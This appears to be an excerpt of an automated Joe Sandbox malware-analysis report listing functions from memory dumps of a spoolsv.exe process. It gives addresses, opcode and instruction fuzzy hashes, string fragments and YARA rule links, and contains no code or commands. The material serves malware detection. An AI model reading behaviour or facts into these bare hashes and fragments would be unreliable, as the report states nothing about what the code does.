Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID: 6$V$]$^
API String ID: 0-1270753922
Opcode ID: 2b10022d8cbe09c05b806504e4dbe33603f497203cdad67dbdc7ffe766c44c20
Instruction ID: 07b80ddd3110100a45e91062fe83c3044c445b20e07afe3c0b4f35994d051383
Opcode Fuzzy Hash: 2b10022d8cbe09c05b806504e4dbe33603f497203cdad67dbdc7ffe766c44c20
Instruction Fuzzy Hash: 3531B171D086298FDBA4EF25C9487EDB6B1AF18341F5041EAD44DA3281CB785EC4CF40

Function 00007FF848F3EB93 Relevance: 5.0, Strings: 4, Instructions: 33COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F3EBA7
N, xrefs: 00007FF848F3EC1B
M, xrefs: 00007FF848F3EBB7
(, xrefs: 00007FF848F3EBE0

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID: "$($M$N
API String ID: 0-2673639397
Opcode ID: 62ff3130e6381cd014ee0762794b2c32f6b580d97bfb03732bf2fe9f33d5f98a
Instruction ID: c7cb3b885825b8006111a728fab5692cf881b9a7ef01f2c368e53f003adce17e
Opcode Fuzzy Hash: 62ff3130e6381cd014ee0762794b2c32f6b580d97bfb03732bf2fe9f33d5f98a
Instruction Fuzzy Hash: 5B01C8B1D092299FDBA5EF64D8443EDB6F1AF08340F5040EAD40DA6281DB389A84DF04

Analysis Process: spoolsv.exePID: 1292, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F23565 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926e41aefd0f7c93b09fde4574c2ff906c0841010e81b5b3a61658cc5957ca09
Instruction ID: c2f1dc2749d7719ea21d480002fa4374fb2cb9c3c30a3964328170c3e82002cf
Opcode Fuzzy Hash: 926e41aefd0f7c93b09fde4574c2ff906c0841010e81b5b3a61658cc5957ca09
Instruction Fuzzy Hash: 8291AD71E1D94E8FEB84EB2C98197B9BBE1FB99350F4001BAC00DD32D6DF6928018B45

Function 00007FF848F2D78A Relevance: 2.9, Strings: 2, Instructions: 387COMMON

Download Yara Rule

Strings

p\H, xrefs: 00007FF848F2D892
NH, xrefs: 00007FF848F2D824

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: 871bb0e620d6b385fcdaa3d0b24a8a5a3c071c5e1f5868f0f9b551374e910b50
Instruction ID: c1c134f2f7b4dca6d3636492d8c374c285337b2ae96ba57749cea862f72ff095
Opcode Fuzzy Hash: 871bb0e620d6b385fcdaa3d0b24a8a5a3c071c5e1f5868f0f9b551374e910b50
Instruction Fuzzy Hash: 27E11571D1965E9EEB98EB68D4A57B8B7B1FF58340F1401BAD009E72C2CB396880CB45

Function 00007FF848F35170 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F3526A

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 784f879b6948777fae186961f58a511ad15c03d952246f54eafb38d19c76be6a
Instruction ID: fb8943cc937b6686757d092532e7eaf1f9c16e2b012f52a9aa614d0a07c1b42e
Opcode Fuzzy Hash: 784f879b6948777fae186961f58a511ad15c03d952246f54eafb38d19c76be6a
Instruction Fuzzy Hash: 12511770D18A1D8FEB94EB68D859BADBBF1FF58340F50006AD00DE7292CB35A885CB40

Function 00007FF848F2C6FB Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F2C739

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 46176a0d6ee29f40196afd14c286aad8ee8b2373d6ce9fb93cda34045548372a
Instruction ID: 7df7222fbe86c5e711ca977d6415a9247cff1ad5601dccff524dd042d20d7ade
Opcode Fuzzy Hash: 46176a0d6ee29f40196afd14c286aad8ee8b2373d6ce9fb93cda34045548372a
Instruction Fuzzy Hash: 9941B13A90E66A9EEB557BA8B8150FD7760EF413B5F080277D508C90C3EF2D644582A9

Function 00007FF848F20A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

vH, xrefs: 00007FF848F20A70

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID: vH
API String ID: 0-2844672238
Opcode ID: df92ffa4f205c5bfe23ef0a55a1a403a1050ef360c7cc1ac136b77f95fb71686
Instruction ID: 08fcf3d01f565c9b77819bf4002b537342d68856987c7998d86dbe38aa2c2438
Opcode Fuzzy Hash: df92ffa4f205c5bfe23ef0a55a1a403a1050ef360c7cc1ac136b77f95fb71686
Instruction Fuzzy Hash: BF115B32D0854E9FE781FB68D8492B97BA0FF98380F8005B6D809C6192EF39A5448B44

Function 00007FF848F211BD Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F2122D

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: 747631d9b47718e3e89cd815f22fc89fff8c4bdc6b10ff94e86d7c53c85aefab
Instruction ID: bb58e2f1578bbd6a1b621325bd690ee2d4c1105ac3c6c31cba04da4c3ca9757e
Opcode Fuzzy Hash: 747631d9b47718e3e89cd815f22fc89fff8c4bdc6b10ff94e86d7c53c85aefab
Instruction Fuzzy Hash: 7A11B270C0D68A4FEB99EB6494692B97BE0FF19341F0404BED00AC70D2EF3A6484C718

Function 00007FF848F211D0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F2122D

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: 6dee8f4cb2b158b7cc8ca73ef5f41363a6c2c50505a710f56047cf895113a810
Instruction ID: 0d0ab006f9f184eaa68f9f887d50a5ca92d39e29d4078732fcfce0ab69147b72
Opcode Fuzzy Hash: 6dee8f4cb2b158b7cc8ca73ef5f41363a6c2c50505a710f56047cf895113a810
Instruction Fuzzy Hash: 52F0A430C1D69E8EEB98ABA4A8192BA7BE4FF55345F00047AE41DC20C1EF396494C618

Function 00007FF848F216B8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02070d8018859fd2f5bcc414201ab544f4dfaf3c46b035679b0f39015f15b5b7
Instruction ID: 18736704d943087c56fdb82936106c4fa5e96afd950aaa94e7a438c14efe301a
Opcode Fuzzy Hash: 02070d8018859fd2f5bcc414201ab544f4dfaf3c46b035679b0f39015f15b5b7
Instruction Fuzzy Hash: F281BD31A0CA4A8FDB58EF5898615B977E2FF98750F14057AD44EC32C6CF35A8428789

Function 00007FF848F21D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbec958669d6e6936d6478e34c03c3698a0b994328f4cc9efa1d82aea4e0350a
Instruction ID: 054e3610091541b80a9a04dd0bec186f40f799df819f5643455ad6df006d0a95
Opcode Fuzzy Hash: fbec958669d6e6936d6478e34c03c3698a0b994328f4cc9efa1d82aea4e0350a
Instruction Fuzzy Hash: 7851C131A0CA9A8FDB48EF5898545BA77E2FF98340F14467ED44AC7281CF35E842C785

Function 00007FF848F2BF8A Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8420dd4589f316f39d229e44e35940949d241c972a58a755c05a0fb47c5d7c4
Instruction ID: eae9c6a1d1a1ebc0e0a80cf0bb28714b7fb2f1b21c09813c6c0194a987accc0e
Opcode Fuzzy Hash: a8420dd4589f316f39d229e44e35940949d241c972a58a755c05a0fb47c5d7c4
Instruction Fuzzy Hash: 66510434E1891E8EEB94EBA894556FDB7B1FF58350F50013AC409E7282DF35A8848B84

Function 00007FF848F23155 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2146dcdcd5176d5a53a46660dbb17b0c855b53a340c5414efe4b32648f8d5200
Instruction ID: 369525f9b6dbde11b9bfcb2385069d7b4b79612407010ec6f6010b6e0925a4f4
Opcode Fuzzy Hash: 2146dcdcd5176d5a53a46660dbb17b0c855b53a340c5414efe4b32648f8d5200
Instruction Fuzzy Hash: F45136B0D0850E8EEB54EBA8E4586EDB7F1FF48341F40007AD009E72E2DB3AA944CB55

Function 00007FF848F22145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a777d2ca39dd5b25257ca8dc0a64ab1bd49f18a42e80be41b75cda30164d594
Instruction ID: 479b24f2260ff72e618238c661fb0ae69150e2936ec0f565b230e1e5df06dde3
Opcode Fuzzy Hash: 4a777d2ca39dd5b25257ca8dc0a64ab1bd49f18a42e80be41b75cda30164d594
Instruction Fuzzy Hash: 8D413531E1DA8A4FE346E778A8551B9BBE0EF46380F0505BAD40CC71D2DF3AA8418365

Function 00007FF848F2C024 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaddf02c4655c2e2adb4877edac3338b5b8a17959d7304f9c6358e326848f50d
Instruction ID: 3bb5a1f0a7b33b594319b8933056782beef398e52f33050f1b65664b1dd17243
Opcode Fuzzy Hash: aaddf02c4655c2e2adb4877edac3338b5b8a17959d7304f9c6358e326848f50d
Instruction Fuzzy Hash: 71310674E1C95D8EEB94FB98A855AFCB7B2FF58340F504029C40DE3282DF2568818B44

Function 00007FF848F2C09C Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3008f4e3fb958f6a661c337609fcf1682c67918108722537cd7ce00dc60623
Instruction ID: f96bcb85cf91bc9ee608d8ebb9c6f28a109413f2f786c6a650e45613edaec95a
Opcode Fuzzy Hash: 8d3008f4e3fb958f6a661c337609fcf1682c67918108722537cd7ce00dc60623
Instruction Fuzzy Hash: 8F310A34E1C95D8FEB94FBA8A8556BCBBB2FF59340F501129C40DE72C2DF2568418B45

Function 00007FF848F2AC5D Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befd1572f8fd05ab75c1fbbf1b94e1b104cc2591d3e8cc23712562fb714b742c
Instruction ID: 4134bded61072123479a9746465f6f27c67a33dda00fac4d4833123e4382d1ac
Opcode Fuzzy Hash: befd1572f8fd05ab75c1fbbf1b94e1b104cc2591d3e8cc23712562fb714b742c
Instruction Fuzzy Hash: BC21D171E4C94ADFE781FB38A8591B9BBE0FF55780F0844B6C019C60D2EF3AA4868744

Function 00007FF848F23350 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3a21be8586ea6017e9fe4675ea3ccd0ac8eedfb35769038000a6b58272083d
Instruction ID: 0f0d3d2b0dd8d9c9ab9f78a3d2fce5c000099e055926303ed32309235231f136
Opcode Fuzzy Hash: 7b3a21be8586ea6017e9fe4675ea3ccd0ac8eedfb35769038000a6b58272083d
Instruction Fuzzy Hash: 0B21D27084D68A8FE742EB7488585A57FF0EF5B301F0804EAD448C71A2DA299956C712

Function 00007FF848F2C7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f1e07b7d8ade9eda3b24156f16e7a4b195977055c937e3113ade2013b8c15d
Instruction ID: 4d87180e52d3afd9ef46ce1b828b2dc2dea1803756a59f2088a1c4bc3ff91bc2
Opcode Fuzzy Hash: e6f1e07b7d8ade9eda3b24156f16e7a4b195977055c937e3113ade2013b8c15d
Instruction Fuzzy Hash: 7E116D3480D68E8FEB46FB28A8691B97BB0FF19341F0405BBD409C71D2EB3A5540C755

Function 00007FF848F234E5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba216f430e8ae3bc0a0748d64615ee590fbd1fc6a38345d9636c6b124298e400
Instruction ID: b50fee94d9277a07c03da1f75b62ea0074b456af4fc902842cc7858030d8abfe
Opcode Fuzzy Hash: ba216f430e8ae3bc0a0748d64615ee590fbd1fc6a38345d9636c6b124298e400
Instruction Fuzzy Hash: 7E113C7090868E8FDB49EF68985A6BA7BA0FF18301F0409BAD419C61E1DB35A5408705

Function 00007FF848F2BA85 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369b4a0275156a53f3240779008717c520c9b48bda950387339be8a6423a9e89
Instruction ID: 9b83a4eeddee46744f8415266310303c1b31e78ad7543c8b5fc2e69bc12fb359
Opcode Fuzzy Hash: 369b4a0275156a53f3240779008717c520c9b48bda950387339be8a6423a9e89
Instruction Fuzzy Hash: 3A115E70919A4E8FDB55FF6894592BABBE0FF18341F4404BAD809C6191EB36A550CB04

Function 00007FF848F22E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54384527e195c4c1febbbf2e400d379c5d30248dd25656e9269a16cbb8a35c18
Instruction ID: 0a61b1c68141a134a0504495b4cd64380ac9b535a97929d2a5ea3f617db3492a
Opcode Fuzzy Hash: 54384527e195c4c1febbbf2e400d379c5d30248dd25656e9269a16cbb8a35c18
Instruction Fuzzy Hash: 75018B30D0DA8E8FE751FB6898996A9BBE0FF59341F0508B6D40CCB1E2EB39E4448705

Function 00007FF848F205D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068ad99009f877a67c0e091cc67732976e8bf56b3a7776eb2e22c55137a68dd6
Instruction ID: 5f8464700e9961614f55f15e6c411e59e267f793cf26b7c7f497a0427e5ada77
Opcode Fuzzy Hash: 068ad99009f877a67c0e091cc67732976e8bf56b3a7776eb2e22c55137a68dd6
Instruction Fuzzy Hash: 9401883094890E8EEB88EFA4D4596BAB7A1FF58345F50457ED40ED21C1CB32B590CB48

Function 00007FF848F2BF0A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1276bcb77d4a5b3ee70d2043046c8aaf0dbf4bc478b49f1eb354d7d37fed53f8
Instruction ID: 011dbf3936beced2841900a1f08a067fad3ce2ae021242ba2fe504436b7307aa
Opcode Fuzzy Hash: 1276bcb77d4a5b3ee70d2043046c8aaf0dbf4bc478b49f1eb354d7d37fed53f8
Instruction Fuzzy Hash: 0D014C7092C95E9EEB98FF6894592B97BE0FF18341F10047AD81EC61D1DB36A550CB04

Function 00007FF848F2283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21c2008f112394804f2723b7d76aff8fce478871ebbaf0d0bfd97bed9c8f91d
Instruction ID: f95f4bd1f54e7b088a9979714df20b9cbee4c8a36bd6c778331829fcdcb86ff8
Opcode Fuzzy Hash: a21c2008f112394804f2723b7d76aff8fce478871ebbaf0d0bfd97bed9c8f91d
Instruction Fuzzy Hash: 3601B83080D64E8FE785BBA898882E9BBE0FF19341F1108B7D408C60A2EB39E0408701

Function 00007FF848F22ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445f264f4a5a7937a6e823272c25fe26fe520e44295191602ac5e50d3b3eb997
Instruction ID: f958b565d0da5d5c0b0f17f688774db20d571ce9d9c0daf720e96739ed88f03b
Opcode Fuzzy Hash: 445f264f4a5a7937a6e823272c25fe26fe520e44295191602ac5e50d3b3eb997
Instruction Fuzzy Hash: 4C017C31D1D6898FE742BB7498592A9BBE0FF5A340F4608B7D408CB0E6EB39A5448711

Function 00007FF848F2A819 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e3179c79a80870f48dded40e3dec1a3f776aa9e4d5a553f54c19b60cddada2
Instruction ID: 6ebcf1aefbad5fc6cbbad08723d4a72b4e6f5d3cc6db557beb6003d7bfb45c06
Opcode Fuzzy Hash: 97e3179c79a80870f48dded40e3dec1a3f776aa9e4d5a553f54c19b60cddada2
Instruction Fuzzy Hash: 0301783084E6895FE752BB24A8591E9BBF0EF5A340F1609F7D408C70A2EB29A488C701

Function 00007FF848F21CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afc6e58faadcf6c5ed8c7da6ca6a2e02f806bf73cd8a7530a286b883c579cb8
Instruction ID: fe14383fbda70b3569826a5ac9a3338570b0a9d081931e0c6161190b6dd4ddaa
Opcode Fuzzy Hash: 2afc6e58faadcf6c5ed8c7da6ca6a2e02f806bf73cd8a7530a286b883c579cb8
Instruction Fuzzy Hash: E701813084D68D8FEB99EF6498592FA7BA0FF55341F4401BAE808C61D2DB76A590C748

Function 00007FF848F20608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5297d9e589e3cdd971c5edff6c0ea3e8328f8eed23c68c053c0a6b2983bbd8
Instruction ID: 03f0d9bd9430800e5917033539ba426925f343a5a3a68921e3a04eac2f5e87d5
Opcode Fuzzy Hash: bd5297d9e589e3cdd971c5edff6c0ea3e8328f8eed23c68c053c0a6b2983bbd8
Instruction Fuzzy Hash: 3401693091C60E9EEB59FFA494586BEB6A1FF18345F50087EE40EC61D1EF36A190C604

Function 00007FF848F20610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20a9d1dc2973e82b5a4c844399df4438f2e76bf620303dc27359938546f3fce
Instruction ID: 0d34e3503ab2c76e255e1afb4d70996e7588637fa0f3f326699f7b31f72a8665
Opcode Fuzzy Hash: a20a9d1dc2973e82b5a4c844399df4438f2e76bf620303dc27359938546f3fce
Instruction Fuzzy Hash: B1016930919A0E9EEB59FB6494592F9B6E0FF18345F20087EE40EC21D1DF3AA550C614

Function 00007FF848F2A930 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8b5c60ba081fbca45cec99eccf59363696fa664c103f320c053106ac7b2cd7
Instruction ID: 98259fe6c256589f4f4b4db629698e6425fe5e07bfbbbd45f391e04e25ef7d65
Opcode Fuzzy Hash: 6e8b5c60ba081fbca45cec99eccf59363696fa664c103f320c053106ac7b2cd7
Instruction Fuzzy Hash: 38F0193095990E9EEF58EB64C4596BEB6A0EF18345F1008BAE40AC21E1DF35A650C644

Function 00007FF848F28888 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
Instruction ID: f29322c425aeb7b68296ccc4b746cde2b64093bfff7e7bab1bdb5c23375c4241
Opcode Fuzzy Hash: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
Instruction Fuzzy Hash: 1211E870D0822A9FDB64DB14D8407A9B7F5FB54340F2481E6D00DA6291DB35AB859F40

Function 00007FF848F205D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67629f4f083bcf79e22c4666d9eb05c5a629d246680179e03d669c1ba160da95
Instruction ID: a75e3c16114ce80b910ea38368d7bce93e6b894ffca737e0f6a19ca2a454e09c
Opcode Fuzzy Hash: 67629f4f083bcf79e22c4666d9eb05c5a629d246680179e03d669c1ba160da95
Instruction Fuzzy Hash: 4FF0AF3085E64E8FEB44EFA4A4152FA77A4FF15344F40057AE80DC21C1DB36A590C788

Function 00007FF848F22759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a290a1ffa73de15179aa3d845caa2117b9b90b2e56591fd41b6efcf143cc32
Instruction ID: 49552728c2b4dc5289109181fd75cddaa3fc3b2e4616c4df738b9661040f7569
Opcode Fuzzy Hash: 92a290a1ffa73de15179aa3d845caa2117b9b90b2e56591fd41b6efcf143cc32
Instruction Fuzzy Hash: C1F0F63180E3CA8FEB5AAF7498682B97F61FF16300F4508FAD409CA1D2EB39A414C701

Function 00007FF848F2AFCB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebffa1743f989001854fa0aeb2eef0952f2e458b043d1c9b90609e994a2e6831
Instruction ID: 144701c22543c056bbca0f228ff3808602d9c20cd5504ce195c145d5b26e7fc8
Opcode Fuzzy Hash: ebffa1743f989001854fa0aeb2eef0952f2e458b043d1c9b90609e994a2e6831
Instruction Fuzzy Hash: CEF0EC70D189198FDB94EB14D446BE9B3B1FF58340F1042A6C40DD3195CB39AAC18F44

Function 00007FF848F227CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

